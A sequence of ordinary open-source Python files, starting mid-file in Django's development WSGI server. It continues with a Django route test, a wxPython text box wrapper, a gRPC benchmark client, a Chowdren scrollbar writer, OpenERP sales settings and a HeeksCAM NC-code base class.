self._write(data[offset:offset+chunk_size])
self._flush()
offset += chunk_size
else:
self._write(data)
self._flush()
def sendfile(self):
"""Platform-specific file transmission
Override this method in subclasses to support platform-specific
file transmission. It is only called if the application's
return iterable ('self.result') is an instance of
'self.wsgi_file_wrapper'.
This method should return a true value if it was able to actually
transmit the wrapped file-like object using a platform-specific
approach. It should return a false value if normal iteration
should be used instead. An exception can be raised to indicate
that transmission was attempted, but failed.
NOTE: this method should call 'self.send_headers()' if
'self.headers_sent' is false and it is going to attempt direct
transmission of the file1.
"""
return False # No platform-specific transmission by default
def finish_content(self):
"""Ensure headers and content have both been sent"""
if not self.headers_sent:
self.headers['Content-Length'] = "0"
self.send_headers()
else:
pass # XXX check if content-length was too short?
def close(self):
try:
self.request_handler.log_request(self.status.split(' ',1)[0], self.bytes_sent)
finally:
try:
if hasattr(self.result,'close'):
self.result.close()
finally:
self.result = self.headers = self.status = self.environ = None
self.bytes_sent = 0; self.headers_sent = False
def send_headers(self):
"""Transmit headers to the client, via self._write()"""
self.cleanup_headers()
self.headers_sent = True
if not self.origin_server or self.client_is_modern():
self.send_preamble()
self._write(str(self.headers))
def result_is_file(self):
"""True if 'self.result' is an instance of 'self.wsgi_file_wrapper'"""
wrapper = self.wsgi_file_wrapper
return wrapper is not None and isinstance(self.result,wrapper)
def client_is_modern(self):
"""True if client can accept status and headers"""
return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
def log_exception(self,exc_info):
"""Log the 'exc_info' tuple in the server log
Subclasses may override to retarget the output or change its format.
"""
try:
from traceback import print_exception
stderr = self.get_stderr()
print_exception(
exc_info[0], exc_info[1], exc_info[2],
self.traceback_limit, stderr
)
stderr.flush()
finally:
exc_info = None
def handle_error(self):
"""Log current error, and send error output to client if possible"""
self.log_exception(sys.exc_info())
if not self.headers_sent:
self.result = self.error_output(self.environ, self.start_response)
self.finish_response()
# XXX else: attempt advanced recovery techniques for HTML or text?
def error_output(self, environ, start_response):
import traceback
start_response(self.error_status, self.error_headers[:], sys.exc_info())
return ['\n'.join(traceback.format_exception(*sys.exc_info()))]
# Pure abstract methods; *must* be overridden in subclasses
def _write(self,data):
self.stdout.write(data)
self._write = self.stdout.write
def _flush(self):
self.stdout.flush()
self._flush = self.stdout.flush
def get_stdin(self):
return self.stdin
def get_stderr(self):
return self.stderr
def add_cgi_vars(self):
self.environ.update(self.base_env)
class WSGIServer(HTTPServer):
"""BaseHTTPServer that implements the Python WSGI protocol"""
application = None
def server_bind(self):
"""Override server_bind to store the server name."""
try:
HTTPServer.server_bind(self)
except Exception, e:
raise WSGIServerException, e
self.setup_environ()
def setup_environ(self):
# Set up base environment
env = self.base_environ = {}
env['SERVER_NAME'] = self.server_name
env['GATEWAY_INTERFACE'] = 'CGI/1.1'
env['SERVER_PORT'] = str(self.server_port)
env['REMOTE_HOST']=''
env['CONTENT_LENGTH']=''
env['SCRIPT_NAME'] = ''
def get_app(self):
return self.application
def set_app(self,application):
self.application = application
class WSGIRequestHandler(BaseHTTPRequestHandler):
server_version = "WSGIServer/" + __version__
def __init__(self, *args, **kwargs):
from django.conf import settings
self.admin_media_prefix = settings.ADMIN_MEDIA_PREFIX
# We set self.path to avoid crashes in log_message() on unsupported
# requests (like "OPTIONS").
self.path = ''
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def get_environ(self):
env = self.server.base_environ.copy()
env['SERVER_PROTOCOL'] = self.request_version
env['REQUEST_METHOD'] = self.command
if '?' in self.path:
path,query = self.path.split('?',1)
else:
path,query = self.path,''
env['PATH_INFO'] = urllib.unquote(path)
env['QUERY_STRING'] = query
env['REMOTE_ADDR'] = self.client_address[0]
if self.headers.typeheader is None:
env['CONTENT_TYPE'] = self.headers.type
else:
env['CONTENT_TYPE'] = self.headers.typeheader
length = self.headers.getheader('content-length')
if length:
env['CONTENT_LENGTH'] = length
for h in self.headers.headers:
k,v = h.split(':',1)
k=k.replace('-','_').upper(); v=v.strip()
if k in env:
continue # skip content length, type,etc.
if 'HTTP_'+k in env:
env['HTTP_'+k] += ','+v # comma-separate multiple headers
else:
env['HTTP_'+k] = v
return env
def get_stderr(self):
return sys.stderr
def handle(self):
"""Handle a single HTTP request"""
self.raw_requestline = self.rfile.readline()
if not self.parse_request(): # An error code has been sent, just exit
return
handler = ServerHandler(self.rfile, self.wfile, self.get_stderr(), self.get_environ())
handler.request_handler = self # backpointer for logging
handler.run(self.server.get_app())
def log_message(self, format, *args):
# Don't bother logging requests for admin images or the favicon.
if self.path.startswith(self.admin_media_prefix) or self.path == '/favicon.ico':
return
sys.stderr.write("[%s] %s\n" % (self.log_date_time_string(), format % args))
class AdminMediaHandler(object):
"""
WSGI middleware that intercepts calls to the admin media directory, as
defined by the ADMIN_MEDIA_PREFIX setting, and serves those images.
Use this ONLY LOCALLY, for development! This hasn't been tested for
security and is not super efficient.
"""
def __init__(self, application, media_dir=None):
from django.conf import settings
self.application = application
if not media_dir:
import django
self.media_dir = \
os.path.join(django.__path__[0], 'contrib', 'admin', 'media')
else:
self.media_dir = media_dir
self.media_url = settings.ADMIN_MEDIA_PREFIX
def file_path(self, url):
"""
Returns the path to the media file on disk for the given URL.
The passed URL is assumed to begin with ADMIN_MEDIA_PREFIX. If the
resultant file path is outside the media directory, then a ValueError
is raised.
"""
# Remove ADMIN_MEDIA_PREFIX.
relative_url = url[len(self.media_url):]
relative_path = urllib.url2pathname(relative_url)
return safe_join(self.media_dir, relative_path)
def __call__(self, environ, start_response):
import os.path
# Ignore requests that aren't under ADMIN_MEDIA_PREFIX. Also ignore
# all requests if ADMIN_MEDIA_PREFIX isn't a relative URL.
if self.media_url.startswith('http://') or self.media_url.startswith('https://') \
or not environ['PATH_INFO'].startswith(self.media_url):
return self.application(environ, start_response)
# Find the admin file and serve it up, if it exists and is readable.
try:
file_path = self.file_path(environ['PATH_INFO'])
except ValueError: # Resulting file path was not valid.
status = '404 NOT FOUND'
headers = {'Content-type': 'text/plain'}
output = ['Page not found: %s' % environ['PATH_INFO']]
start_response(status, headers.items())
return output
if not os.path.exists(file_path):
status = '404 NOT FOUND'
headers = {'Content-type': 'text/plain'}
output = ['Page not found: %s' % environ['PATH_INFO']]
else:
try:
fp = open(file_path, 'rb')
except IOError:
status = '401 UNAUTHORIZED'
headers = {'Content-type': 'text/plain'}
output = ['Permission denied: %s' % environ['PATH_INFO']]
else:
# This is a very simple implementation of conditional GET with
# the Last-Modified header. It makes media files a bit speedier
# because the files are only read off disk for the first
# request (assuming the browser/client supports conditional
# GET).
mtime = http_date(os.stat(file_path)[stat.ST_MTIME])
headers = {'Last-Modified': mtime}
if environ.get('HTTP_IF_MODIFIED_SINCE', None) == mtime:
status = '304 NOT MODIFIED'
output = []
else:
status = '200 OK'
mime_type = mimetypes.guess_type(file_path)[0]
if mime_type:
headers['Content-Type'] = mime_type
output = [fp.read()]
fp.close()
start_response(status, headers.items())
return output
def run(addr, port, wsgi_handler):
server_address = (addr, port)
httpd = WSGIServer(server_address, WSGIRequestHandler)
httpd.set_app(wsgi_handler)
httpd.serve_forever()
| mit |
ccowmu/whatistheplan.com | tests/test_routes.py | 1 | 1776 | from django.contrib.auth.models import User
from django.test import Client, TestCase
from django.core.urlresolvers import reverse
class RoutesTest(TestCase):
def setUp(self):
self.client = Client()
self.logged_in_client = Client()
self.user = User.objects.create_user("testuser", "[email protected]", "test_password")
self.logged_in_client.login(username="testuser", password="test_password")
def test_home_route(self):
"""Home returns 200"""
response = self.client.get(reverse('Home'))
self.assertEqual(response.status_code, 200)
def test_events_route(self):
"""Events returns 200"""
response = self.client.get(reverse('Events'))
self.assertEqual(response.status_code, 200)
def test_about_route(self):
"""About returns 200"""
response = self.client.get(reverse('About'))
self.assertEqual(response.status_code, 200)
def test_twitch_route(self):
response = self.client.get(reverse('Twitch'))
self.assertEqual(response.status_code, 200)
def test_sign_up_route(self):
"""Sign Up returns 200"""
response = self.client.get(reverse('Sign Up'))
self.assertEqual(response.status_code, 200)
def test_log_in_route(self):
"""Log in returns 200"""
response = self.client.get(reverse('Log In'))
self.assertEqual(response.status_code, 200)
def test_log_out_route_for_logged_in_user(self):
"""Log Out redirects home for a logged in user"""
response = self.logged_in_client.get(reverse('Log Out'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], 'http://testserver/')
def tearDown(self):
self.user.delete()
| mit |
bblais/plasticity | plasticity/dialogs/waxy/textbox.py | 1 | 4652 | # textbox.py
import waxyobject
import wx
import core
import styles
class TextBox(wx.TextCtrl, waxyobject.WaxyObject):
__events__ = {
'Char': wx.EVT_CHAR, # do all controls have this?
'MaxLength': wx.EVT_TEXT_MAXLEN, # alias for TextMaxLen
'Text': wx.EVT_TEXT,
'TextEnter': wx.EVT_TEXT_ENTER,
'TextMaxLen': wx.EVT_TEXT_MAXLEN,
'TextURL': wx.EVT_TEXT_URL,
}
def __init__(self, parent, text="", size=None, **kwargs):
style = 0
style |= self._params(kwargs)
style |= styles.window(kwargs)
wx.TextCtrl.__init__(self, parent, wx.NewId(), text,
size=size or (125,-1), style=style)
self.BindEvents()
styles.properties(self, kwargs)
def write(self, s):
# Added so we can use a TextBox as a file-like object and redirect
# stdout to it.
self.AppendText(s)
try:
core.Yield()
except:
pass
def GetCurrentLineNumber(self):
""" Return the current line number (i.e. the number of the line the
cursor is on). """
pos = self.GetInsertionPoint()
x, y = self.PositionToXY(pos)
return y
def GetLines(self):
""" Return the current text as a list of lines. (Changing the list
does not affect the contents of the TextBox.) """
text = self.GetValue()
lines = text.split("\n")
return lines
def SetModified(self, modified):
if modified:
# set to modified by appending a dummy space and removing it again
self.AppendText(' ')
lastpos = self.GetLastPosition()
self.Remove(lastpos-1, lastpos)
else:
self.DiscardEdits()
def GetModified(self):
""" Returns true if the contents of the control were modified. (Alias
for IsModified(). """
return self.IsModified()
def InsertText(self, pos, text):
""" Insert text at the given position. """
old_insertion_point = self.GetInsertionPoint()
self.SetInsertionPoint(pos)
self.WriteText(text)
# put cursor at original insertion point
if old_insertion_point <= pos:
self.SetInsertionPoint(old_insertion_point)
else:
self.SetInsertionPoint(old_insertion_point + len(text))
# ideas:
# should Remove support negative indexes? (like slices)
# should it support slicing? e.g. del atextbox[10:20]
#
# style parameters
#_textbox_justify = {
# "left": wx.TE_LEFT,
# "center": wx.TE_CENTRE,
# "centre": wx.TE_CENTRE,
# "middle": wx.TE_CENTRE,
# "right": wx.TE_RIGHT,
#}
__styles__ = {
'justify': ({
'left': wx.TE_LEFT,
'center': wx.TE_CENTRE,
'centre': wx.TE_CENTRE,
'middle': wx.TE_CENTRE,
'right': wx.TE_RIGHT,
}, styles.DICTSTART),
'multiline': (wx.TE_MULTILINE, styles.NORMAL),
'password': (wx.TE_PASSWORD, styles.NORMAL),
'readonly': (wx.TE_READONLY, styles.NORMAL),
'wrap': (wx.TE_DONTWRAP, styles.NORMAL | styles.REVERSE),
'process_enter': (wx.TE_PROCESS_ENTER, styles.NORMAL),
'process_tab': (wx.TE_PROCESS_TAB, styles.NORMAL),
'rich': (wx.TE_RICH, styles.NORMAL),
'rich2': (wx.TE_RICH2, styles.NORMAL),
'auto_url': (wx.TE_AUTO_URL, styles.NORMAL),
'hscroll': (wx.HSCROLL, styles.NORMAL),
}
def _params(self, kwargs):
flags = 0 | wx.TE_NOHIDESEL # maybe add the option of changing this one
#flags |= styles.stylebool('multiline', wx.TE_MULTILINE, kwargs)
#flags |= styles.stylebool('password', wx.TE_PASSWORD, kwargs)
#flags |= styles.stylebool('readonly', wx.TE_READONLY, kwargs)
#flags |= styles.stylebool('wrap', wx.TE_DONTWRAP, kwargs, reverse=1)
#flags |= styles.stylebool('process_enter', wx.TE_PROCESS_ENTER, kwargs)
#flags |= styles.stylebool('process_tab', wx.TE_PROCESS_TAB, kwargs)
#flags |= styles.stylebool('rich', wx.TE_RICH, kwargs)
#flags |= styles.stylebool('rich2', wx.TE_RICH2, kwargs)
#flags |= styles.stylebool('auto_url', wx.TE_AUTO_URL, kwargs)
#flags |= styles.stylebool('hscroll', wx.HSCROLL, kwargs)
#flags |= styles.styledictstart('justify', self._textbox_justify, kwargs, 0)
flags |= styles.dostyle(self.__styles__, kwargs)
return flags
| mit |
wcevans/grpc | src/python/grpcio_tests/tests/qps/benchmark_client.py | 23 | 7701 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Defines test client behaviors (UNARY/STREAMING) (SYNC/ASYNC)."""
import abc
import threading
import time
from concurrent import futures
from six.moves import queue
import grpc
from src.proto.grpc.testing import messages_pb2
from src.proto.grpc.testing import services_pb2
from tests.unit import resources
from tests.unit import test_common
_TIMEOUT = 60 * 60 * 24
class GenericStub(object):
def __init__(self, channel):
self.UnaryCall = channel.unary_unary(
'/grpc.testing.BenchmarkService/UnaryCall')
self.StreamingCall = channel.stream_stream(
'/grpc.testing.BenchmarkService/StreamingCall')
class BenchmarkClient:
"""Benchmark client interface that exposes a non-blocking send_request()."""
__metaclass__ = abc.ABCMeta
def __init__(self, server, config, hist):
# Create the stub
if config.HasField('security_params'):
creds = grpc.ssl_channel_credentials(
resources.test_root_certificates())
channel = test_common.test_secure_channel(
server, creds, config.security_params.server_host_override)
else:
channel = grpc.insecure_channel(server)
# waits for the channel to be ready before we start sending messages
grpc.channel_ready_future(channel).result()
if config.payload_config.WhichOneof('payload') == 'simple_params':
self._generic = False
self._stub = services_pb2.BenchmarkServiceStub(channel)
payload = messages_pb2.Payload(
body='\0' * config.payload_config.simple_params.req_size)
self._request = messages_pb2.SimpleRequest(
payload=payload,
response_size=config.payload_config.simple_params.resp_size)
else:
self._generic = True
self._stub = GenericStub(channel)
self._request = '\0' * config.payload_config.bytebuf_params.req_size
self._hist = hist
self._response_callbacks = []
def add_response_callback(self, callback):
"""callback will be invoked as callback(client, query_time)"""
self._response_callbacks.append(callback)
@abc.abstractmethod
def send_request(self):
"""Non-blocking wrapper for a client's request operation."""
raise NotImplementedError()
def start(self):
pass
def stop(self):
pass
def _handle_response(self, client, query_time):
self._hist.add(query_time * 1e9) # Report times in nanoseconds
for callback in self._response_callbacks:
callback(client, query_time)
class UnarySyncBenchmarkClient(BenchmarkClient):
def __init__(self, server, config, hist):
super(UnarySyncBenchmarkClient, self).__init__(server, config, hist)
self._pool = futures.ThreadPoolExecutor(
max_workers=config.outstanding_rpcs_per_channel)
def send_request(self):
# Send requests in seperate threads to support multiple outstanding rpcs
# (See src/proto/grpc/testing/control.proto)
self._pool.submit(self._dispatch_request)
def stop(self):
self._pool.shutdown(wait=True)
self._stub = None
def _dispatch_request(self):
start_time = time.time()
self._stub.UnaryCall(self._request, _TIMEOUT)
end_time = time.time()
self._handle_response(self, end_time - start_time)
class UnaryAsyncBenchmarkClient(BenchmarkClient):
def send_request(self):
# Use the Future callback api to support multiple outstanding rpcs
start_time = time.time()
response_future = self._stub.UnaryCall.future(self._request, _TIMEOUT)
response_future.add_done_callback(
lambda resp: self._response_received(start_time, resp))
def _response_received(self, start_time, resp):
resp.result()
end_time = time.time()
self._handle_response(self, end_time - start_time)
def stop(self):
self._stub = None
class _SyncStream(object):
def __init__(self, stub, generic, request, handle_response):
self._stub = stub
self._generic = generic
self._request = request
self._handle_response = handle_response
self._is_streaming = False
self._request_queue = queue.Queue()
self._send_time_queue = queue.Queue()
def send_request(self):
self._send_time_queue.put(time.time())
self._request_queue.put(self._request)
def start(self):
self._is_streaming = True
response_stream = self._stub.StreamingCall(self._request_generator(),
_TIMEOUT)
for _ in response_stream:
self._handle_response(
self, time.time() - self._send_time_queue.get_nowait())
def stop(self):
self._is_streaming = False
def _request_generator(self):
while self._is_streaming:
try:
request = self._request_queue.get(block=True, timeout=1.0)
yield request
except queue.Empty:
pass
class StreamingSyncBenchmarkClient(BenchmarkClient):
def __init__(self, server, config, hist):
super(StreamingSyncBenchmarkClient, self).__init__(server, config, hist)
self._pool = futures.ThreadPoolExecutor(
max_workers=config.outstanding_rpcs_per_channel)
self._streams = [
_SyncStream(self._stub, self._generic, self._request,
self._handle_response)
for _ in xrange(config.outstanding_rpcs_per_channel)
]
self._curr_stream = 0
def send_request(self):
# Use a round_robin scheduler to determine what stream to send on
self._streams[self._curr_stream].send_request()
self._curr_stream = (self._curr_stream + 1) % len(self._streams)
def start(self):
for stream in self._streams:
self._pool.submit(stream.start)
def stop(self):
for stream in self._streams:
stream.stop()
self._pool.shutdown(wait=True)
self._stub = None
| bsd-3-clause |
joaormatos/anaconda | Chowdren/chowdren/writers/extensions/EasyScrollbar.py | 1 | 1944 | from chowdren.writers.objects import ObjectWriter
from chowdren.common import get_animation_name, to_c, make_color
from chowdren.writers.events import (ComparisonWriter, ActionMethodWriter,
ConditionMethodWriter, ExpressionMethodWriter, make_table)
from mmfparser.bitdict import BitDict
from mmfparser.data.font import LogFont
import glob, os
class ScrollbarObject(ObjectWriter):
class_name = 'ScrollbarObject'
filename = 'scrollbarext'
def write_init(self, writer):
data = self.get_data()
width = data.readShort(True)
height = data.readShort(True)
#hidden = data.readByte() != 0
#enabled = data.readByte() != 0
#tab_stop = data.readByte() != 0
data.skipBytes(3)
vertical = data.readByte() != 0
min_val = data.readInt(True)
max_val = data.readInt(True)
val = data.readInt(True)
# Last 4 bytes are always '4 0 0 0' (?)
writer.putlnc('width = %s;', width)
writer.putlnc('height = %s;', height)
writer.putlnc('vertical = %s;', vertical)
writer.putlnc('min_val = %s;', min_val)
writer.putlnc('max_val = %s;', max_val)
writer.putlnc('init_scrollbar(%s);', val)
def has_updates(self):
return True
#def get_sources(self):
# script_dir = os.path.dirname(__file__)
# base_dir = os.path.join(script_dir, '..', '..', '..', 'base')
# base_dir = os.path.abspath(base_dir)
# print glob.glob(os.path.join(base_dir, 'staticlibs', 'gwen', '*.cpp'))
# return ['objects/scrollbarext.cpp']
actions = make_table(ActionMethodWriter, {
1 : 'set_scroll_range',
9 : 'set_width',
10 : 'set_height',
11 : 'set_visible(true)',
12 : 'set_visible(false)'
})
conditions = make_table(ConditionMethodWriter, {
})
expressions = make_table(ExpressionMethodWriter, {
0 : 'get_value'
})
def get_object():
return ScrollbarObject
| gpl-3.0 |
0k/OpenUpgrade | addons/sale_stock/res_config.py | 331 | 5235 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.tools.translate import _
class sale_configuration(osv.osv_memory):
_inherit = 'sale.config.settings'
_columns = {
'group_invoice_deli_orders': fields.boolean('Generate invoices after and based on delivery orders',
implied_group='sale_stock.group_invoice_deli_orders',
help="To allow your salesman to make invoices for Delivery Orders using the menu 'Deliveries to Invoice'."),
'task_work': fields.boolean("Prepare invoices based on task's activities",
help='Lets you transfer the entries under tasks defined for Project Management to '
'the Timesheet line entries for particular date and particular user with the effect of creating, editing and deleting either ways '
'and to automatically creates project tasks from procurement lines.\n'
'-This installs the modules project_timesheet and sale_service.'),
'default_order_policy': fields.selection(
[('manual', 'Invoice based on sales orders'), ('picking', 'Invoice based on deliveries')],
'The default invoicing method is', default_model='sale.order',
help="You can generate invoices based on sales orders or based on shippings."),
'module_delivery': fields.boolean('Allow adding shipping costs',
help='Allows you to add delivery methods in sales orders and delivery orders.\n'
'You can define your own carrier and delivery grids for prices.\n'
'-This installs the module delivery.'),
'default_picking_policy' : fields.boolean("Deliver all at once when all products are available.",
help = "Sales order by default will be configured to deliver all products at once instead of delivering each product when it is available. This may have an impact on the shipping price."),
'group_mrp_properties': fields.boolean('Product properties on order lines',
implied_group='sale.group_mrp_properties',
help="Allows you to tag sales order lines with properties."),
'module_project_timesheet': fields.boolean("Project Timesheet"),
'module_sale_service': fields.boolean("Sale Service"),
'group_route_so_lines': fields.boolean('Choose MTO, drop shipping,... on sales order lines',
implied_group='sale_stock.group_route_so_lines',
help="Allows you to choose a delivery route on sales order lines"),
}
_defaults = {
'default_order_policy': 'manual',
}
def default_get(self, cr, uid, fields, context=None):
res = super(sale_configuration, self).default_get(cr, uid, fields, context)
# task_work, time_unit depend on other fields
res['task_work'] = res.get('module_sale_service') and res.get('module_project_timesheet')
return res
def get_default_sale_config(self, cr, uid, ids, context=None):
ir_values = self.pool.get('ir.values')
default_picking_policy = ir_values.get_default(cr, uid, 'sale.order', 'picking_policy')
return {
'default_picking_policy': default_picking_policy == 'one',
}
def set_sale_defaults(self, cr, uid, ids, context=None):
if uid != SUPERUSER_ID and not self.pool['res.users'].has_group(cr, uid, 'base.group_erp_manager'):
raise openerp.exceptions.AccessError(_("Only administrators can change the settings"))
ir_values = self.pool.get('ir.values')
wizard = self.browse(cr, uid, ids)[0]
default_picking_policy = 'one' if wizard.default_picking_policy else 'direct'
ir_values.set_default(cr, SUPERUSER_ID, 'sale.order', 'picking_policy', default_picking_policy)
res = super(sale_configuration, self).set_sale_defaults(cr, uid, ids, context)
return res
def onchange_invoice_methods(self, cr, uid, ids, group_invoice_so_lines, group_invoice_deli_orders, context=None):
if not group_invoice_deli_orders:
return {'value': {'default_order_policy': 'manual'}}
if not group_invoice_so_lines:
return {'value': {'default_order_policy': 'picking'}}
return {}
| agpl-3.0 |
play113/swer | heekscam-read-only/nc/nc.py | 25 | 20718 | ################################################################################
# nc.py
#
# Base class for NC code creation
# And global functions for calling current creator
#
# Hirutso Enni, 2009-01-13
# altered by Dan Falck 2010-08-04
# added tap() arguments Michael Haberler 2010-10-07
################################################################################
ncOFF = 0
ncLEFT = -1
ncRIGHT = +1
ncCW = -1
ncCCW = +1
ncMIST = 1
ncFLOOD = 2
################################################################################
class Creator:
def __init__(self):
pass
############################################################################
## Internals
def file_open(self, name):
self.file = open(name, 'w')
self.filename = name
def file_close(self):
self.file.close()
def write(self, s):
self.file.write(s)
############################################################################
## Programs
def program_begin(self, id, name=''):
"""Begin a program"""
pass
def add_stock(self, type_name, params):
pass
def program_stop(self, optional=False):
"""Stop the machine"""
pass
def program_end(self):
"""End the program"""
pass
def flush_nc(self):
"""Flush all pending codes"""
pass
############################################################################
## Subprograms
def sub_begin(self, id, name=''):
"""Begin a subprogram"""
pass
def sub_call(self, id):
"""Call a subprogram"""
pass
def sub_end(self):
"""Return from a subprogram"""
pass
############################################################################
## Settings
def imperial(self):
"""Set imperial units"""
pass
def metric(self):
"""Set metric units"""
pass
def absolute(self):
"""Set absolute coordinates"""
pass
def incremental(self):
"""Set incremental coordinates"""
pass
def polar(self, on=True):
"""Set polar coordinates"""
pass
def set_plane(self, plane):
"""Set plane"""
pass
def set_temporary_origin(self, x=None, y=None, z=None, a=None, b=None, c=None):
"""Set temporary origin G92"""
pass
def remove_temporary_origin(self):
"""Remote temporary origin G92.1"""
pass
############################################################################
## Tools
def tool_change(self, id):
"""Change the tool"""
pass
def tool_defn(self, id, name='', params=None):
"""Define a tool"""
pass
def offset_radius(self, id, radius=None):
"""Set tool radius offsetting"""
pass
def offset_length(self, id, length=None):
"""Set tool length offsetting"""
pass
def current_tool(self):
return None
############################################################################
## Datums
def datum_shift(self, x=None, y=None, z=None, a=None, b=None, c=None):
"""Shift the datum"""
pass
def datum_set(self, x=None, y=None, z=None, a=None, b=None, c=None):
"""Set the datum"""
pass
def workplane(self, id):
"""Set the workplane"""
pass
def clearanceplane(self,z=None):
"""set clearance plane"""
pass
############################################################################
## APT360 like Transformation Definitions
## These definitions were created while looking at Irvin Kraal's book on APT
## - Numerical Control Progamming in APT - page 211
def matrix(self,a1=None,b1=None,c1=None,a2=None,b2=None,c2=None,a3=None,b3=None,c3=None):
"""Create a matrix for transformations"""
pass
def translate(self,x=None,y=None,z=None):
"""Translate in x,y,z direction"""
pass
def rotate(self,xyrot=None,yzrot=None,zxrot=None,angle=None):
"""Rotate about a coordinate axis"""
pass
def scale(self,k=None):
"""Scale by factor k"""
pass
def matrix_product(self,matrix1=None,matrix2=None):
"""Create matrix that is the product of two other matrices"""
pass
def mirror_plane(self,plane1=None,plane2=None,plane3=None):
"""Mirror image about one or more coordinate planes"""
pass
def mirror_line(self,line=None):
"""Mirror about a line"""
pass
############################################################################
## Rates + Modes
def feedrate(self, f):
"""Set the feedrate"""
pass
def feedrate_hv(self, fh, fv):
"""Set the horizontal and vertical feedrates"""
pass
def spindle(self, s, clockwise=True):
"""Set the spindle speed"""
pass
def coolant(self, mode=0):
"""Set the coolant mode"""
pass
def gearrange(self, gear=0):
"""Set the gear range"""
pass
############################################################################
## Moves
def rapid(self, x=None, y=None, z=None, a=None, b=None, c=None):
"""Rapid move"""
pass
def feed(self, x=None, y=None, z=None, a = None, b = None, c = None):
"""Feed move"""
pass
def arc_cw(self, x=None, y=None, z=None, i=None, j=None, k=None, r=None):
"""Clockwise arc move"""
pass
def arc_ccw(self, x=None, y=None, z=None, i=None, j=None, k=None, r=None):
"""Counterclockwise arc move"""
pass
def dwell(self, t):
"""Dwell"""
pass
def rapid_home(self, x=None, y=None, z=None, a=None, b=None, c=None):
"""Rapid relative to home position"""
pass
def rapid_unhome(self):
"""Return from rapid home"""
pass
def set_machine_coordinates(self):
"""Set machine coordinates"""
pass
############################################################################
## Cutter radius compensation
def use_CRC(self):
"""CRC"""
return False
############################################################################
## Cycles
def pattern(self):
"""Simple pattern eg. circle, rect"""
pass
def pocket(self):
"""Pocket routine"""
pass
def profile(self):
"""Profile routine"""
pass
def drill(self, x=None, y=None, dwell=None, depthparams = None, retract_mode=None, spindle_mode=None, internal_coolant_on=None, rapid_to_clearance=None):
"""Drilling routines"""
pass
# original prototype was:
# def tap(self, x=None, y=None, z=None, zretract=None, depth=None, standoff=None, dwell_bottom=None, pitch=None, stoppos=None, spin_in=None, spin_out=None):
#
# current call is like so:
# tap(x=10, y=10, z=0, tap_mode=0, depth=12.7, standoff=6.35, direction=0, pitch=1.25)
# just add tap_mode & direction parameters
def tap(self, x=None, y=None, z=None, zretract=None, depth=None, standoff=None, dwell_bottom=None, pitch=None, stoppos=None, spin_in=None, spin_out=None, tap_mode=None, direction=None):
"""Tapping routines"""
pass
def bore(self, x=None, y=None, z=None, zretract=None, depth=None, standoff=None, dwell_bottom=None, feed_in=None, feed_out=None, stoppos=None, shift_back=None, shift_right=None, backbore=False, stop=False):
"""Boring routines"""
pass
def end_canned_cycle(self):
pass
############################################################################
## Misc
def comment(self, text):
"""Insert a comment"""
pass
def insert(self, text):
"""APT style INSERT statement"""
pass
def block_delete(self, on=False):
"""block to ignore if block delete switch is on"""
pass
def variable(self, id):
"""Insert a variable"""
pass
def variable_set(self, id, value):
"""Set a variable"""
pass
def probe_linear_centre_outside(self, x1=None, y1=None, depth=None, x2=None, y2=None ):
pass
def probe_single_point(self, point_along_edge_x=None, point_along_edge_y=None, depth=None, retracted_point_x=None, retracted_point_y=None, destination_point_x=None, destination_point_y=None, intersection_variable_x=None, intersection_variable_y=None, probe_offset_x_component=None, probe_offset_y_component=None ):
pass
def probe_downward_point(self, x=None, y=None, depth=None, intersection_variable_z=None):
pass
def report_probe_results(self, x1=None, y1=None, z1=None, x2=None, y2=None, z2=None, x3=None, y3=None, z3=None, x4=None, y4=None, z4=None, x5=None, y5=None, z5=None, x6=None, y6=None, z6=None, xml_file_name=None ):
pass
def open_log_file(self, xml_file_name=None ):
pass
def log_coordinate(self, x=None, y=None, z=None):
pass
def log_message(self, message=None):
pass
def close_log_file(self):
pass
def rapid_to_midpoint(self, x1=None, y1=None, z1=None, x2=None, y2=None, z2=None):
pass
def rapid_to_intersection(self, x1, y1, x2, y2, x3, y3, x4, y4, intersection_x, intersection_y, ua_numerator, ua_denominator, ua, ub_numerator, ub):
pass
def rapid_to_rotated_coordinate(self, x1, y1, x2, y2, ref_x, ref_y, x_current, y_current, x_final, y_final):
pass
def set_path_control_mode(self, mode, motion_blending_tolerance, naive_cam_tolerance ):
pass
############################################################################
